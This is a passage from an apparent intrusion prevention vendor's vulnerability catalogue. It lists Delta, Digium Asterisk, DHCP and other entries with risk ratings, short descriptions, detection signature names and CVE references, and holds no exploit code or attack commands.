Risk: Moderate
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Platform: Generic
Software: Delta Industrial Automation DOPSoft
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Delta Industrial Automation DOPSoft. The vulnerability is due to improper handling of the LabelSst records in XLS files. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted XLS file. Successful exploitation could result in execution of arbitrary code under the security context of the user running DOPSoft.
Situation: File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Labelsst-Memory-Corruption
References:
CVE-2021-38404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38404
Back to top

Delta-Industrial-Automation-DOPSoft-XLS-Mulblank-Record-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Industrial Automation DOPSoft
Risk: Moderate
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Platform: Generic
Software: Delta Industrial Automation DOPSoft
Type: Buffer Overflow
Description: Improper handling of MulBlank records in XLS files causes a buffer overflow vulnerability in Delta Automation DOPSoft. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation: File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Mulblank-Record-Parsing-Heap-Buffer-Overflow
References:
CVE-2021-38406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38406
Back to top

Delta-Industrial-Automation-DOPSoft-XLS-MulRk-Record-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Industrial Automation DOPSoft
Risk: Moderate
First detected in: sgpkg-ips-1420-5242
Last changed: sgpkg-ips-1420-5242
Platform: Generic
Software: Delta Industrial Automation DOPSoft
Type: Buffer Overflow
Description: Improper handling of MulRk records in XLS files causes a buffer overflow vulnerability in Delta Automation DOPSoft. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation: File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-MulRk-Record-Parsing-Heap-Buffer-Overflow
References:
CVE-2021-38406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38406
Back to top

Delta-Infrasuite-Device-Master-Checkloadingstartupconfig-Dir-Traversal

About this vulnerability: A vulnerability in Delta Electronics InfraSuite Device Master
Risk: Moderate
First detected in: sgpkg-ips-1526-5242
Last changed: sgpkg-ips-1526-5242
Platform: Generic
Software: Delta Electronics InfraSuite Device Master
Type: Directory Traversal
Description: Improper processing of ZIP archives in the CheckLoadingStartupConfig function causes a directory traversal vulnerability un Delta Electronics InfraSuite Device Master. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the affected user.
Situation: Generic_CS-Delta-Electronics-Infrasuite-Device-Master-Checkloadingstartupconfig-Directory-Traversal
References:
CVE-2022-41772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41772
Back to top

DenyAll-Web-Application-Firewall-Remote-Code-Execution

About this vulnerability: A DenyAll Web Application Firewall Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: DenyAll
Type: Input Validation
Description: A vulnerability in DenyAll Web Application Firewall which allows remote attackers to execute arbitrary code through the 'type' parameter due to the lack of input validation.
Situation: HTTP_CRL-DenyAll-Web-Application-Firewall-Remote-Code-Execution
References:
CVE-2017-14706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14706
Back to top

Destiny-Media-Player-Buffer-Overflow

About this vulnerability: A Destiny Media Player Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Destiny Media Player
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Destiny Media Player, version 1.61, which allows remote attackers to execute arbitrary code via a long string in a .pls playlist file.
Situation: File-Text_Destiny-Media-Player-Buffer-Overflow
References:
CVE-2009-3429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3429
BID-33091
http://www.securityfocus.com/bid/33091
OSVDB-53249
http://www.osvdb.org/53249
Back to top

DevDojo-Voyager-Arbitrary-File-Leak-And-Deletion-CVE-2024-55415

About this vulnerability: An attempt to exploit a vulnerability in DevDojo Voyager detected
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: DevDojo Voyager
Type: Input Validation
Description: DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the "/admin/compass" route.
Situation: HTTP_CSU-DevDojo-Voyager-Arbitrary-File-Leak-And-Deletion-CVE-2024-55415
References:
CVE-2024-55415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55415
Back to top

DevDojo-Voyager-Reflected-XSS-CVE-2024-55416

About this vulnerability: An attempt to exploit a vulnerability in DevDojo Voyager detected
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: DevDojo Voyager
Type: Input Validation
Description: DevDojo Voyager through version 1.8.0 is vulnerable to reflected XSS via "/admin/compass" route. By manipulating an authenticated user to click on a link, arbitrary Javascript can be executed.
Situation: HTTP_CSU-DevDojo-Voyager-Reflected-XSS-CVE-2024-55416
References:
CVE-2024-55416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55416
Back to top

DEWESoft-X3-Internal-Command-Access-CVE-2018-7756

About this vulnerability: A vulnerability in DEWESoft X3 SP1
Risk: High
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Platform: Generic
Software: DEWESoft X3
Type: Insecure Configuration
Description: RunExeFile.exe in the DEWESoft X3 SP1 installer allows unauthenticated sessions on TCP port 1999. Successful exploitation of this vulnerability may allow arbitrary code execution and access to the internal commands.
Situation: Generic_CS-DEWESoft-X3-Internal-Command-Access-CVE-2018-7756
References:
CVE-2018-7756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7756
Back to top

DHCP-ISC-DHCP-dhclient-script_write_params-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in ISC DHCP dhclient
Risk: High
First detected in: sgpkg-ips-235-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP dhclient
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in ISC DHCP dhclient. The vulnerability can be exploited by sending a malicious DHCP ACK message to a vulnerable DHCP client. An exploit leads to a denial of service condition, terminating the affected application, or to system-level code execution.
Situation: Generic_UDP-ISC-DHCP-dhclient-script-write-params-Buffer-Overflow
BOOTP_CS-ISC-DHCP-dhclient-script-write-params-Buffer-Overflow
References:
CVE-2009-0692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692
BID-35668
http://www.securityfocus.com/bid/35668
OSVDB-55819
http://www.osvdb.org/55819
Back to top

Dhcpcd-Dhcpv6-Dhcp6_Findna-Buffer-Overflow

About this vulnerability: A vulnerability in Dhcpcd
Risk: Moderate
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dhcpcd
Type: Buffer Overflow
Description: Improper handling of NA and TA addresses in DHCPv6 messages causes a buffer overflow vulnerability in DHCPCD. A successful exploit may allow an attacker to run arbitrary code with the privileges of the daemon.
Situation: Generic_UDP-Dhcpcd-Dhcpv6-Dhcp6_Findna-Buffer-Overflow
References:
CVE-2019-11577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11577
Back to top

Dhcpcd-Packet-Size-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Dhcpcd Dhcpcd
Risk: High
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-1296-5242
Platform: SUSE Linux Enterprise Server 11;Debian GNU/Linux
Software: Dhcpcd
Type: Buffer Overflow
Description: A vulnerability has been reported in dhcpcd that could allow remote attackers to execute arbitrary code on a vulnerable target. The vulnerability is due to insufficient validation on packets size supplied by DHCP clients. A remote attacker impersonating a DHCP server on the adjacent network could exploit this by sending a crafted packet to the target host. Successful exploitation would allow an attacker to inject arbitrary code into the DHCP Client.
Situation: Generic_UDP-Dhcpd-Packet-Size-Stack-Buffer-Overflow
BOOTP_CS-Dhcpd-Packet-Size-Stack-Buffer-Overflow
References:
CVE-2012-2152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2152
BID-53354
http://www.securityfocus.com/bid/53354
OSVDB-83228
http://www.osvdb.org/83228
Back to top

Dhcpv6-Buffer-Overread-CVE-2023-38152

About this vulnerability: An attempt to exploit a vulnerability in Windows DHCPv6 server detected
Risk: High
First detected in: sgpkg-ips-1630-5242
Last changed: sgpkg-ips-1630-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Buffer overread vulnerability in Windows DHCPv6 implementation.
Situation: Generic_UDP-Dhcpv6-Buffer-Overread-CVE-2023-38152
References:
CVE-2023-38152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38152
ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep
Back to top

Diaenergie-SQL-Injection-CVE-2024-4548

About this vulnerability: An attempt to exploit a vulnerability in DIAEnergie detected
Risk: High
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: SQL Injection
Description: A vulnerability in Delta Electronics DIAEnergie, version v1.10 and before, which allows remote attackers to execute arbitrary SQL commands via the RecalculateHDMWYC message.
Situation: HTTP_CS-Diaenergie-SQL-Injection-CVE-2024-4548
References:
CVE-2024-4548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4548
Back to top

Dialerpornpaq

About this vulnerability: DialerPornpaq
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DialerPornpaq
Type: Misconfiguration
Description: DialerPornpaq is a malware that will try to perform a high-cost phone call via modem to access pornographic material.
Situation: HTTP_CSH-Dialerpornpaq
Back to top

DiamondFox-Botnet

About this vulnerability: DiamondFox botnet
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: DiamondFox is a botnet that can for example be used to steal information from the infected system.
Situation: HTTP_CRL-DiamondFox-Traffic
Back to top

Dicoogle-PACS-Web-Server-Directory-Traversal

About this vulnerability: A vulnerability in Dicoogle PACS Web Server
Risk: High
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Dicoogle PACS
Type: Input Validation
Description: A vulnerability in Dicoogle PACS Web Server, version 2.5.0, which allows remote attackers to read arbitrary files due to the lack of sufficient input validation.
Situation: HTTP_CSU-Dicoogle-PACS-Web-Server-Directory-Traversal
Back to top

Digiever-DS2105-Pro-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in DigiEver DS-2105 Pro detected
Risk: High
First detected in: sgpkg-ips-1817-5242
Last changed: sgpkg-ips-1817-5242
Platform: Generic
Software: DigiEver DS-2105 Pro
Type: Input Validation
Description: A vulnerability in DigiEver DS-2105 Pro DVRs is being exploited to spread malware. No CVE has been assigned to it yet.
Situation: HTTP_CRL-Digiever-DS2105-Pro-Remote-Code-Execution
Back to top

Digital-Watchdog-Dw-Megapix-Command-Injection-CVE-2022-34538

About this vulnerability: A vulnerability in Digital Watchdog DW MEGApix
Risk: High
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Platform: Generic
Software: Digital Watchdog DW MEGApix
Type: Input Validation
Description: A command injection vulnerability has been reported in the Digital Watchdog DW MEGApix IP camera firmware version A7.2.2_20211029.
Situation: HTTP_CRL-Digital-Watchdog-Dw-Megapix-Command-Injection-CVE-2022-34538
References:
CVE-2022-34538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34538
Back to top

Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Input Validation
Description: Insufficient validation of Caller-IDs within SIP requests causes a command execution vulnerability in Digium Asterisk. A successful exploit allows an attacker to run arbitrary code on the target system without authentication.
Situation: Generic_UDP-Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution
SIP-UDP_Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution
References:
CVE-2017-14100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14100
Back to top

Digium-Asterisk-Cdr-Ast_Cdr_Setuserfield-Buffer-Overflow

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Buffer Overflow
Description: An insufficient length check causes a buffer overflow vulnerability in Digium Asterisk. A successful exploitation allows an attacker to run arbitrary code with the privileges of the daemon.
Situation: SIP_Digium-Asterisk-Cdr-Ast_Cdr_Setuserfield-Buffer-Overflow
References:
CVE-2017-7617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7617
Back to top

Digium-Asterisk-Chan_Skinny-Sccp-Packet-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: High
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Infinite Loop
Description: There exists a denial of service vulnerability in Digium Asterisk. A remote, unauthenticated attacker can cause a vulnerable server to terminate by sending a crafted SCCP packet.
Situation: Generic_CS-Digium-Asterisk-Chan_Skinny-Sccp-Packet-Denial-Of-Service
Back to top

Digium-Asterisk-Compound-Rtcp-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: There exists an out-of-bounds write vulnerability in Digium Asterisk. A remote, authenticated attacker can use this to execute arbitrary code on the affected system.
Situation: Generic_UDP-Digium-Asterisk-Compound-Rtcp-Out-Of-Bounds-Write
References:
CVE-2017-17664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17664
Back to top

Digium-Asterisk-Cookie-Stack-Overflow

About this vulnerability: A vulnerability in Digium Certified Asterisk
Risk: Moderate
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Digium Asterisk
Type: Resource Starvation
Description: A stack-overflow vulnerability has been reported in Digium Asterisk. The vulnerability is due to insufficient validation of Cookie: headers in HTTP requests sent to the HTTP management interface. A remote attacker can exploit this vulnerability to cause a denial-of-service condition.
Situation: HTTP_CS-Digium-Asterisk-Cookie-Stack-Overflow
References:
CVE-2014-2286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2286
BID-66093
http://www.securityfocus.com/bid/66093
OSVDB-104327
http://www.osvdb.org/104327
Back to top

Digium-Asterisk-CSeq-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Buffer Overflow
Description: Improper handling of a long CSeq header in a SIP request causes a heap buffer overflow vulnerability in Digium Asterisk. A successful exploitation can allow an attacker to cause a denial of service condition or in some cases, remote code execution.
Situation: Generic_UDP-Digium-Asterisk-CSeq-Heap-Buffer-Overflow
SIP_Digium-Asterisk-CSeq-Heap-Buffer-Overflow
Back to top

Digium-Asterisk-File-Descriptor-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Resource Starvation
Description: A denial of service condition has been reported in Digium Asterisk. The vulnerability is due to file descriptor exhaustion from a large number of crafted SIP INVITE requests. A remote attacker can exploit this vulnerability to cause a denial of service condition.
Situation: SIP-TCP_CS-Digium-Asterisk-File-Descriptor-Denial-Of-Service
SIP-UDP_CS-Digium-Asterisk-File-Descriptor-Denial-Of-Service
References:
CVE-2014-2287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2287
BID-66094
http://www.securityfocus.com/bid/66094
OSVDB-104326
http://www.osvdb.org/104326
Back to top

Digium-Asterisk-HTTP-Management-Interface-Stack-Overflow

About this vulnerability: A vulnerability in Digium Asterisk Digiumphones
Risk: High
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: A stack overflow vulnerability exists in Digium Asterisk. The vulnerability is due to an unchecked memory allocation on the stack, which can result in a stack overflow or writing of attacker-controlled data to arbitrary memory locations. A remote attacker can use this vulnerability by sending a malicious request to a vulnerable Asterisk server. Successful exploitation of this vulnerability would result in execution of arbitrary attacker code in the security context of the asterisk server or termination of the server, causing denial of service to legitimate users.
Situation: HTTP_CSH-Digium-Asterisk-HTTP-Management-Interface-Stack-Overflow
References:
CVE-2012-5976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5976
OSVDB-88876
http://www.osvdb.org/88876
Back to top

Digium-Asterisk-HTTP-Manager-Interface-Resource-Exhaustion

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: High
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Digium Asterisk
Type: Resource Starvation
Description: A memory exhaustion vulnerability has been found in Digium Asterisk. The vulnerability is due to the use of a user-controlled size value in a memory allocation without validation. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious HTTP request to the HTTP management interface of a vulnerable version of Asterisk. Successful exploitation would result in the service's inability to allocate memory and possibly termination of the vulnerable program, denying service to legitimate users.
Situation: HTTP_CSH-Digium-Asterisk-HTTP-Manager-Interface-Resource-Exhaustion
References:
CVE-2013-2686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2686
Back to top

Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Business Edition
Risk: Moderate
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Resource Starvation
Description: There is a resource exhaustion denial of service vulnerability in Digium's Asterisk. The vulnerability is due to a design weakness in the way Asterisk associates messages with the calls they belong to. An unauthenticated, remote attacker can exploit this vulnerability by sending a large number of messages to a vulnerable system. Successful exploitation exhausts the call number space, resulting in a denial of service condition.
Situation: Analyzer_Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service
Generic_UDP-Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service
References:
CVE-2009-2346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346
BID-36275
http://www.securityfocus.com/bid/36275
Back to top

Digium-Asterisk-Manager-User-Shell-Command-Execution

About this vulnerability: A vulnerability in Digium Asterisk Business Edition
Risk: Moderate
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: A security bypass vulnerability has been reported in Digium Asterisk. The vulnerability is due to insufficient permission validation while executing shell commands from unauthorized users. Remote, authenticated attackers without sufficient privileges can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in execution of arbitrary script code in the context of the affected server. Successful exploitation would result in execution of arbitrary script code in the context of the affected server.
Situation: Generic_CS-Digium-Asterisk-Manager-Shell-Command-Usage
References:
CVE-2012-2414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2414
BID-53206
http://www.securityfocus.com/bid/53206
OSVDB-81454
http://www.osvdb.org/81454
Back to top

Digium-Asterisk-Multiple-Products-IAX2-Handshake-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Appliance Developer Kit
Risk: Moderate
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: There exists a denial of service vulnerability in multiple Digium Asterisk products. The vulnerability is due to insufficient verification of ACK responses during IAX2 handshakes by the IAX2 protocol. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted message to the target server. Successful attack could create a denial of service condition on the Asterisk service. Upon successful exploitation of the vulnerability, the attack can make the target asterisk server send a large amount of data to a target host being spoofed. This might cause resource exhaustion for both the asterisk server and the target. If the attack stops sending the attacks, the target will recover in a time frame of a few minutes.
Situation: Generic_UDP-IAX2-Malformed-ACK-Message
References:
CVE-2008-1897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1897
BID-28901
http://www.securityfocus.com/bid/28901
Back to top

Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: Improper handling of non-SIP uris in SIP requests causes a denial of service vulnerability in Digium Asterisk.
Situation: Generic_UDP-Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service
SIP-UDP_Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service
References:
CVE-2017-14098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14098
Back to top

Digium-Asterisk-pjsip-Channel-Driver-Register-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-759-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: A denial of service condition can be caused by an attacker by exploiting a vulnerability resulting from improper validation of request parameters.
Situation: SIP-UDP_Digium-Asterisk-pjsip-Channel-Driver-Register-Denial-Of-Service
Back to top

Digium-Asterisk-pjsip-Contact-Header-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: A denial of service exists in Digium Asterisk. A remote attacker could exploit this by sending a SIP message that does not contain a contact header. Successful exploitation could cause the Asterisk server to terminate.
Situation: SIP_Digium-Asterisk-pjsip-Contact-Header-Denial-Of-Service
References:
CVE-2017-17850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17850
Back to top

Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: There has been reported a denial-of-service vulnerability in Asterisk. Succesful exploitation can lead in denial-of-service conditions.
Situation: Generic_UDP-Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
Generic_TCP-Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
SIP_Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
References:
CVE-2019-12827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12827
Back to top

Digium-Asterisk-pjsip-Stack-ACK-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: High
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: There exists a denial of service vulnerability in Digium AsteriskPJSIP stack. A remote, unauthenticated attacker can use this to cause a denial of service condition.
Situation: SIP-UDP_Digium-Asterisk-pjsip-Stack-ACK-Denial-Of-Service
Back to top

Digium-Asterisk-pjsip_Multipart_Parse-Denial-Of-Service

About this vulnerability: A vulnerability in Teluu Ltd. PJPROJECT
Risk: High
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Teluu Ltd. PJPROJECT; Digium Asterisk
Type: Malfunction
Description: There exists a denial of service vulnerability in Digium Asterisk.
Situation: SIP-UDP_Digium-Asterisk-pjsip_Multipart_Parse-Denial-Of-Service
Back to top

Digium-Asterisk-Res_HTTP_WebSocket-HTTP-Upgrade-Request-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk Open Source; Digium Certified Asterisk
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in Digium Asterisk. The vulnerability is due to improper handling of HTTP Upgrade requests during initial WebSocket connection establishment within the res_http_websocket module of Asterisk. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could result in a denial-of-service condition.
Situation: HTTP_CS-Digium-Asterisk-Res_HTTP_WebSocket-HTTP-Upgrade-Request-Denial-Of-Service
References:
CVE-2018-17281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17281
Back to top

Digium-Asterisk-Res_pjsip_pubsub-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1049-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: Improper processing of accept headers in SUBSCRIBE requests causes an out of bounds write vulnerability in Asterisk. A successful exploit allows an attacker to cause a denial of service condition or execute code with the privileges of the daemon.
Situation: SIP_Digium-Asterisk-Res_pjsip_pubsub-Out-Of-Bounds-Write
References:
CVE-2018-7284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7284
Back to top

Digium-Asterisk-RTP-Stack-Information-Disclosure

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: Improper handling of RTP and RTCP packets causes an information disclosure vulnerability in Asterisk. A successful exploit allows potentially sensitive information to be accessed by a remote attacker.
Situation: Generic_UDP-Digium-Asterisk-RTP-Stack-Information-Disclosure
References:
CVE-2017-14099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14099
Back to top

Digium-Asterisk-SIP-Channel-Driver-Denial-Of-Service

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic SIP application
Type: Input Validation
Description: There is a denial of service vulnerability in Digium Asterisk's SIP channel driver. The vulnerability is due to the way an uninitialized variable is handled in a malformed REGISTER request. A remote unauthenticated attacker can exploit this vulnerability by sending a malformed request. Successful exploitation will crash the application, resulting in denial of service.
Situation: SIP_Empty-Contact-Header
SIP_Method-REGISTER-Without-Contact-Header
References:
CVE-2011-4063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4063
BID-50177
http://www.securityfocus.com/bid/50177
Back to top

Digium-Asterisk-SIP-Invalid-Response-Code-Denial-Of-Service

About this vulnerability: Null-dereference vulnerability in the handling of SIP reponse messages in Digium Asterisk
Risk: Moderate
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: There is a null-dereference vulnerability in the handling of SIP reponse messages in Digium Asterisk. A remote authenticated attacker can send a crafted SIP response to the target server to terminate the vulnerable Asterisk server causing a denial of service condition.
Situation: SIP-UDP_CS-Digium-Asterisk-SIP-Invalid-Response-Code-Denial-Of-Service
References:
CVE-2007-1594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1594
BID-23093
http://www.securityfocus.com/bid/23093
Back to top

Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: High
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Asterisk Open Source. The vulnerability is due to insufficient boundary checking when parsing attribute strings in SIP SDP headers and allows overflowing a stack buffer with an overly long string. Remote, unauthenticated attackers could exploit this vulnerability by sending a specially crafted SIP message to the vulnerable server. Successful exploitation would cause a stack-based buffer overflow that could allow the attacker to execute arbitrary code on the vulnerable system.
Situation: SIP-TCP_CS-Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow
SIP-UDP_CS-Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow
References:
CVE-2013-2685
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2685
OSVDB-91753
http://www.osvdb.org/91753
Back to top

Digium-Asterisk-SIP-Sscanf-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Digium Asterisk
Risk: Moderate
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Input Validation
Description: There is a denial of service vulnerability in Digium Asterisk SIP Channel Driver. The vulnerability is due to insufficient input validation when processing maliciously crafted SIP requests. Remote authenticated attackers could exploit this vulnerability by crafting SIP requests that contain excessively long numeric strings. Successful exploitation could result in a denial of service condition.
Situation: Generic_TCP-CS-Digium-Asterisk-SIP-Sscanf-Denial-Of-Service
SIP-TCP_CS-Digium-Asterisk-SIP-Sscanf-Denial-Of-Service
References:
CVE-2009-2726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726
BID-36015
http://www.securityfocus.com/bid/36015
Back to top

Digium-Asterisk-Skinny-Channel-Driver-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: High
